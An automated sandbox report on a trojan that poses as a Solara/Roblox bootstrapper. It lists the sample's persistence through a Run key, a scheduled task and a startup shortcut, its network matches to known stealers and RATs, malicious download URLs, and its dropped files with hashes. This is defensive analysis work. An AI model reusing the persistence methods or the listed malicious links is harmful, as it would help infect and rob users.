Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579069
Start date and time: 2024-12-20 19:02:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: YgJ5inWPQO.exe (renamed because the original name is a hash value)
Original Sample Name: fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@49/42@6/6
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 126
• Number of non-executed functions: 222
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.22, 52.149.20.212, 40.126.53.13, 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target System User.exe, PID 1976 because it is empty
• Execution Graph export aborted for target System User.exe, PID 2296 because it is empty
• Execution Graph export aborted for target System User.exe, PID 7868 because it is empty
• Execution Graph export aborted for target System User.exe, PID 8160 because it is empty
• Execution Graph export aborted for target dddd.exe, PID 6476 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 2212 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 4932 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7288 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7524 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: YgJ5inWPQO.exe
Time | Type | Description
13:03:19 | API Interceptor | 71x Sleep call for process: dddd.exe modified
13:03:20 | API Interceptor | 66x Sleep call for process: powershell.exe modified
13:03:38 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
13:04:28 | API Interceptor | 72x Sleep call for process: msedge.exe modified
19:04:29 | Task Scheduler | Run new task: System User path: C:\Users\user\AppData\Roaming\System User.exe
19:04:29 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System User C:\Users\user\AppData\Roaming\System User.exe
19:04:38 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run System User C:\Users\user\AppData\Roaming\System User.exe
19:04:47 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk
Match: 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
KJhsNv2RcI.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
gs7lQa4EuM.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
doc00290320092.jse | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
DHL_231437894819.bat.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
dlhost.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
WdlA0C4PkO.exe | malicious | Go Stealer, Skuld Stealer | ip-api.com/json
xt.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
roblox1.exe | malicious | Python Stealer, Monster Stealer | ip-api.com/json
roblox.exe | malicious | Python Stealer, Monster Stealer | ip-api.com/json
random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | ip-api.com/json
                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                getsolara.devwmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                sDKRz09zM7.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                • 172.67.203.125
                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                bootstraper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                • 104.21.93.27
                                                                                                                                                                                AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                • 104.21.93.27
edge-term4-fra2.roblox.com
  wmdqEYgW2i.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
    • 128.116.123.3
  8Hd0ZExgJz.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse
    • 128.116.123.3
  KKjubdmzCR.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
    • 128.116.123.3
  SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Get hash | malicious | Blank Grabber | Browse
    • 128.116.123.4
  oIDX88LpSs.exe | Get hash | malicious | XWorm | Browse
    • 128.116.123.4
  hKWBNgRd7p.exe | Get hash | malicious | XWorm | Browse
    • 128.116.123.3
  BootstrapperV1.19.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
    • 128.116.123.4
  SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe | Get hash | malicious | Unknown | Browse
    • 128.116.123.3
  SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe | Get hash | malicious | Unknown | Browse
    • 128.116.123.3
  SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe | Get hash | malicious | Unknown | Browse
    • 128.116.123.4
nodejs.org
  wp-s2.exe | Get hash | malicious | Python BackDoor | Browse
    • 104.20.22.46
  wp-s2.exe | Get hash | malicious | Python BackDoor | Browse
    • 104.20.22.46
  wp-cent.exe | Get hash | malicious | Python BackDoor | Browse
    • 104.20.22.46
  wp-cent.exe | Get hash | malicious | Python BackDoor | Browse
    • 104.20.22.46
  WTvNL75dCr.exe | Get hash | malicious | Python BackDoor | Browse
    • 104.20.22.46
  WTvNL75dCr.exe | Get hash | malicious | Python BackDoor | Browse
    • 104.20.22.46
  wmdqEYgW2i.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
    • 104.20.22.46
  Bootstrapper.exe | Get hash | malicious | Unknown | Browse
    • 104.20.22.46
  https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | Get hash | malicious | HTMLPhisher | Browse
    • 104.20.23.46
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ROBLOX-PRODUCTIONUS
  armv7l.elf | Get hash | malicious | Mirai | Browse
    • 209.206.45.42
  wmdqEYgW2i.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
    • 128.116.123.3
  Bootstrapper.exe | Get hash | malicious | Unknown | Browse
    • 128.116.119.3
  https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | Get hash | malicious | HTMLPhisher | Browse
    • 128.116.119.3
  sDKRz09zM7.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
    • 128.116.119.3
  kwlYObMOSn.exe | Get hash | malicious | XWorm | Browse
    • 128.116.119.3
  bootstraper.exe | Get hash | malicious | Unknown | Browse
    • 128.116.119.3
  bootstraper.exe | Get hash | malicious | Unknown | Browse
    • 128.116.119.3
  8Hd0ZExgJz.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse
    • 128.116.123.3
  KKjubdmzCR.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
    • 128.116.123.3
TUT-ASUS
  KJhsNv2RcI.exe | Get hash | malicious | XWorm | Browse
    • 208.95.112.1
  gs7lQa4EuM.exe | Get hash | malicious | XWorm | Browse
    • 208.95.112.1
  doc00290320092.jse | Get hash | malicious | AgentTesla, PureLog Stealer | Browse
    • 208.95.112.1
  file.exe | Get hash | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | Browse
    • 208.95.112.1
  DHL_231437894819.bat.exe | Get hash | malicious | AgentTesla | Browse
    • 208.95.112.1
  dlhost.exe | Get hash | malicious | XWorm | Browse
    • 208.95.112.1
  WdlA0C4PkO.exe | Get hash | malicious | Go Stealer, Skuld Stealer | Browse
    • 208.95.112.1
  xt.exe | Get hash | malicious | XWorm | Browse
    • 208.95.112.1
  roblox1.exe | Get hash | malicious | Python Stealer, Monster Stealer | Browse
    • 208.95.112.1
  roblox.exe | Get hash | malicious | Python Stealer, Monster Stealer | Browse
    • 208.95.112.1
CLOUDFLARENETUS
  http://url4659.orders.vanillagift.com/ls/click?upn=u001.4gSefN7qGt7uZc-2BljvSfDuK9c6f7zz-2BRDdNLkOmxp-2BfCpVRV4q5JSM05F18NmhW9aTh4D-2B-2FvKc3l62XSGdMxHErqjDyHVaRGnhWtdaxelWfxz8x2-2FY7A4qgb3tzDonO-2BR4v55hRVWLW8mGedQ4WKyhGmLG6TdN0VE3FuoaMfqbWnIJZADjzcMmwi0-2FbwmmeKkdfIhUk0sBHSi9RcRmdsfuOZwL5O2zEB6UFf08dp06kJXruK-2BF70HVCIIa3GSMCo48RLkzWG8dEOH-2FBZmckwy2IyrmhGk7TORgwM5bk4PbUxQPoYKq7IdXZDoj7BBWFZXgs6KkXD1kVfgQOsMLEKQeTvK5ATiMGw5YUv9FTPZiWgh4O-2B6hR3uc5gCam5ygOCJsmG3ya5dOP3AzZxmtrQO2ixrFnkLK-2Bkk5ChvTn26C-2BioOkvRUSczMMaDc3goe-2FffK-2FLybPlPtaG8BM0aogkRmbjy7uKwhjOW-2BFQyWewVzg-3DIgAR_79LTZgGyJjQA0yKF2CHqblXBaDJuc2sNW7Piu5vjvmdwcqDrB-2Buw9ZQukwHO-2BFDa1Pj-2BnPyP1wnuiUj8o1jeVFZ-2B0yTi1w6olXhC5xGcnSuX-2FPX8EC9nfY-2B3npShVzZ4Fae90bxak04TDiCsiP7PmtAOagYeRI4FU2qDP2MtD3eIC1vtRjmGkonGMDUW1rPFYKa2pBviC8swsnzOU26q7ssqOo-2FLjO6-2B2IyWprhTXXBsBk2HZWehLV3F8Prl0XOgIIe0Oi6f3V8mliLO9NN8Iw-3D-3D | Get hash | malicious | Unknown | Browse
    • 104.19.230.21
  phish_alert_iocp_v1.10.16(15).eml | Get hash | malicious | Unknown | Browse
    • 104.19.229.21
  https://lvxsystem.info/ | Get hash | malicious | Unknown | Browse
    • 172.67.183.243
  Set-up.exe | Get hash | malicious | LummaC Stealer | Browse
    • 104.21.84.113
  Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe | Get hash | malicious | MassLogger RAT | Browse
    • 172.67.177.134
  file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT | Browse
    • 172.67.197.170
  Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe | Get hash | malicious | MassLogger RAT | Browse
    • 104.21.67.152
  Fortexternal.exe | Get hash | malicious | Unknown | Browse
    • 172.67.75.163
  Loader.exe | Get hash | malicious | LummaC | Browse
    • 104.21.90.135
  Sentinelled.vbs | Get hash | malicious | Unknown | Browse
    • 104.21.86.72
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e
  P0RN-vidz.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  2AIgdyA1Cl.exe | Get hash | malicious | Stealc, Vidar | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  Sentinelled.vbs | Get hash | malicious | Unknown | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta | Get hash | malicious | Cobalt Strike | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  QUOTATION#008792.exe | Get hash | malicious | AgentTesla | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  Invoice DHL - AWB 2024 E4001 - 0000731.exe | Get hash | malicious | Snake Keylogger | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment | Get hash | malicious | HTMLPhisher | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
  ktyihkdfesf.exe | Get hash | malicious | Vidar | Browse
    • 128.116.123.3
    • 104.21.93.27
    • 104.20.22.46
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dll
• wp-s2.exe, Detection: malicious, Threat Name: Python BackDoor
• wp-s2.exe, Detection: malicious, Threat Name: Python BackDoor
• wp-cent.exe, Detection: malicious, Threat Name: Python BackDoor
• wp-cent.exe, Detection: malicious, Threat Name: Python BackDoor
• WTvNL75dCr.exe, Detection: malicious, Threat Name: Python BackDoor
• WTvNL75dCr.exe, Detection: malicious, Threat Name: Python BackDoor
• chos.exe, Detection: malicious, Threat Name: Unknown
• ihost.exe, Detection: malicious, Threat Name: Python Stealer, Muck Stealer
• ahost.exe, Detection: malicious, Threat Name: Blank Grabber
• PixelFlasher.exe, Detection: malicious, Threat Name: Unknown

Process:C:\Windows\System32\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):1.2564849147072306
Encrypted:false
SSDEEP:192:lKuBAdr0bU9+dQlaWxejol2/fsLzuiF1Z24lO8J:cuBACbG+dQlaGl23sLzuiF1Y4lO8J
MD5:FD1D8A1E04AF77B12B4C7821BA254246
SHA1:0046A2784EDDB2F7B24BA2E56F134F42C8455A14
SHA-256:A6771D3A837FDA4BCCFEDA217E89EEAC2819EF8670EE8EC676FC3DBA4FE595E7
SHA-512:C6A6CA011F4C92CE3321C12107E005336AB68F4A6C5E3DFC605FFAE15811BB71E56F4CB73264FF4CD2BC815AE37E809C9A349C32B05E18DF6818FCD8368D1037
Malicious:false
Preview (UTF-16 decoded):
Version=1
EventType=CLR20r3
EventTime=133791914086680152
ReportType=2
Consent=1
UploadTime=133791914094023782
ReportStatus=524384
ReportIdentifier=6bf57e09-797d-465b-954e-e36e0306d837
IntegratorReportIdentifier=d5b7bd20-89ae-4ef0-9cc1-910fabc16863
Wow64Host=34404
NsAppName=dddd.exe
OriginalFilename=SolaraBootstrapper.exe
AppSessionGuid=0000194c-0001-0014-92c1-36700953db01
TargetAppId=W:00062fe173631cadc4a7695d39957a12de9c00000000!000030231a467a49cc37768eea0f55f4bea1cbfb48e2!dddd.ex

Process:C:\Windows\System32\WerFault.exe
File Type:Mini DuMP crash report, 16 streams, Fri Dec 20 18:03:29 2024, 0x1205a4 type
Category:dropped
Size (bytes):616622
Entropy (8bit):3.2795922451199595
Encrypted:false
SSDEEP:3072:/bGmA3+vprpoVmfyBOXpIymdSZIJR70S9VU4aPMR+37ktkvau7LWTVdcSr5Y4viw:TGmA3QI79Up++4i1LWr1Y4QqvXA6bB
MD5:27E1A100399119486D0998B0EE284F86
SHA1:DA90E68266055C6D6FA5CFC67D3B4A131ADF0B6A
SHA-256:A3C3690EFA375536A99D55CBD795AC4CFA31F8B513C6DBD8AFB6273FEC9F9A89
SHA-512:5D2836758BDDDC95F9AD052236C93A4EA23E01A2F3D088B8923E049623538515C234BCBAC276254AEFBB93EA244B2002A4C636B38D966E0640C31E206EE59AA3
Malicious:false

Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):6768
Entropy (8bit):3.7164055635204187
Encrypted:false
SSDEEP:192:R6l7wVeJK8ZpgP5cYZ58UcprM089bO5UfAam:R6lXJxZpgBcYHlvxOqfM
MD5:2F57F10661DC5271D0F324CD82546485
SHA1:0CD51E8CC0FA79924CD94965D071283667DAD258
SHA-256:FC6A41F698876782E3D91B38D372EE1A572AAB04655BEAA141E976427F21C6C6
SHA-512:6C383397A31E1E03B4DF941F07147FCC1EBDC8983F51D3DCD22994A4CAAAE4B81D3E4724909B690B50AE6C5F74301641B561B6DACD8CBCFB2F0E9196A1E48187
Malicious:false
Preview (UTF-16 decoded):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>6476</Pi

Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4769
Entropy (8bit):4.436060729624475
Encrypted:false
SSDEEP:48:cvIwWl8zs1Jg771I93tSWpW8VYLYm8M4JoD/FGWyq8vq3DIWad:uIjfPI7gV7VTJfWWssWad
MD5:0220813281E5296BC47C75B1EF0C9D0B
SHA1:7F7E177B2BAF371523B34DB66118795C1421B438
SHA-256:1BA3F8D0C8272B5D1A4D382C14911D4785BEB74C3B63C9719244584B9B40E233
SHA-512:FFC47A01576F82E345E2708A29CE0E028B3C636888E8C8BE95832B63B5586DE87EDE2DA9A4A91BF14253101246F4429272F214D6F950FF31E291F9E320097092
Malicious:false
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
  <src>
   <desc>
    <mach>
     <os>
      <arg nm="vermaj" val="10" />
      <arg nm="vermin" val="0" />
      <arg nm="verbld" val="19045" />
      <arg nm="vercsdbld" val="2006" />
      <arg nm="verqfe" val="2006" />
      <arg nm="csdbld" val="2006" />
      <arg nm="versp" val="0" />
      <arg nm="arch" val="9" />
      <arg nm="lcid" val="2057" />
      <arg nm="geoid" val="223" />
      <arg nm="sku" val="48" />
      <arg nm="domain" val="0" />
      <arg nm="prodsuite" val="256" />
      <arg nm="ntprodtype" val="1" />
      <arg nm="platid" val="2" />
      <arg nm="tmsi" val="639906" />
      <arg nm="osinsty" val="1" />
      <arg nm="iever" val="11.789.19041.0-11.0.1000" />
      <arg nm="portos" val="0" />
      <arg nm="ram" val="409

Process:C:\Users\user\AppData\Roaming\System User.exe
File Type:CSV text
Category:dropped
Size (bytes):654
Entropy (8bit):5.380476433908377
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:false
Preview:
1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0
3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\msedge.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):41
Entropy (8bit):3.7195394315431693
Encrypted:false
SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:false
Preview:
### explorer ###
[WIN]r[WIN]r[WIN]r
Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):120400
Entropy (8bit):6.6017475353076716
Encrypted:false
SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:862F820C3251E4CA6FC0AC00E4092239
SHA1:EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: wp-s2.exe, Detection: malicious
• Filename: wp-s2.exe, Detection: malicious
• Filename: wp-cent.exe, Detection: malicious
• Filename: wp-cent.exe, Detection: malicious
• Filename: WTvNL75dCr.exe, Detection: malicious
• Filename: WTvNL75dCr.exe, Detection: malicious
• Filename: chos.exe, Detection: malicious
• Filename: ihost.exe, Detection: malicious
• Filename: ahost.exe, Detection: malicious
• Filename: PixelFlasher.exe, Detection: malicious
Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):85496
Entropy (8bit):6.614481743039511
Encrypted:false
SSDEEP:1536:XEfz7lgmVLsSIX0qku0Spf72hbktIj865spLFImLV7yUzR9AfIIoT:0fz1IX8FS12itIA66pLFImLV5X
MD5:C17DCB7FC227601471A641EC90E6237F
SHA1:C93A8C2430E844F40F1D9C880AA74612409FFBB9
SHA-256:55894B2B98D01F37B9A8CF4DAF926D0161FF23C2FB31C56F9DBBAC3A61932712
SHA-512:38851CBD234A51394673A7514110EB43037B4E19D2A6FB79471CC7D01DBCF2695E70DF4BA2727C69F1FED56FC7980E3CA37FDDFF73CC3294A2EA44FACDEB0FA9
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):280808
Entropy (8bit):6.594541687872342
Encrypted:false
SSDEEP:6144:ZtC0Z5JA0/8cyMn9qWM53pLW1Acr8sJMIsgVFe:DbJAy86a9diFe
MD5:AD4324E5CC794D626FFCCDA544A5A833
SHA1:EF925E000383B6CAD9361430FC38264540D434A5
SHA-256:040F361F63204B55C17A100C260C7DDFADD00866CC055FBD641B83A6747547D5
SHA-512:0A002B79418242112600B9246DA66A5C04651AECB2E245F0220B2544D7B7DF67A20139F45DDF2D4E7759CE8CC3D6B4BE7F98B0A221C756449EB1B6D7AF602325
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):65528
Entropy (8bit):6.228447315858868
Encrypted:false
SSDEEP:1536:2LDxflFwY9XDhnuVNv1dImvIqyUzR9yRfIPF:2J92ATMVNv1dImvI5qd
MD5:422E214CA76421E794B99F99A374B077
SHA1:58B24448AB889948303CDEFE28A7C697687B7EBC
SHA-256:78223AEF72777EFC93C739F5308A3FC5DE28B7D10E6975B8947552A62592772B
SHA-512:03FCCCC5A300CC029BEF06C601915FA38604D955995B127B5B121CB55FB81752A8A1EEC4B1B263BA12C51538080335DABAEF9E2B8259B4BF02AF84A680552FA0
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):159224
Entropy (8bit):6.86011233030861
Encrypted:false
SSDEEP:3072:kn18fe1+/ol6s/7NjQWzjUZ1/oPEznfB9mNo7r0J0q4BcFIm01zwWO:k0s0Ef0gS5YO7ICq4BcYw
MD5:66A9028EFD1BB12047DAFCE391FD6198
SHA1:E0B61CE28EA940F1F0D5247D40ABE61AE2B91293
SHA-256:E44DEA262A24DF69FD9B50B08D09AE6F8B051137CE0834640C977091A6F9FCA8
SHA-512:3C2A4E2539933CBEB1D0B3C8EF14F0563675FD53B6EF487C7A5371DFE2EE1932255F91DB598A61AAADACD8DC2FE2486A91F586542C52DFC054B22AD843831D1E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):84984
Entropy (8bit):6.333897580970998
Encrypted:false
SSDEEP:1536:auV3gvWHQdMq3ORC/OypTNQlyJ+9+nzLYwsSI6tzOCu5ImywwyUzR9EtfI5gn:auVQvcQTSypTNQlyJs+nzLYaI6Qt5ImX
MD5:ABF998769F3CBA685E90FA06E0EC8326
SHA1:DAA66047CF22B6BE608127F8824E59B30C9026BF
SHA-256:62D0493CED6CA33E2FD8141649DD9889C23B2E9AFC5FDF56EDB4F888C88FB823
SHA-512:08C6B3573C596A15ACCF4936533567415198A0DAAB5B6E9824B820FD1F078233BBC3791FDE6971489E70155F7C33C1242B0B0A3A17FE2EC95B9FADAE555ED483
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1396821
Entropy (8bit):5.531015514770172
Encrypted:false
SSDEEP:12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
MD5:18C3F8BF07B4764D340DF1D612D28FAD
SHA1:FC0E09078527C13597C37DBEA39551F72BBE9AE8
SHA-256:6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
SHA-512:135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
Malicious:false
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
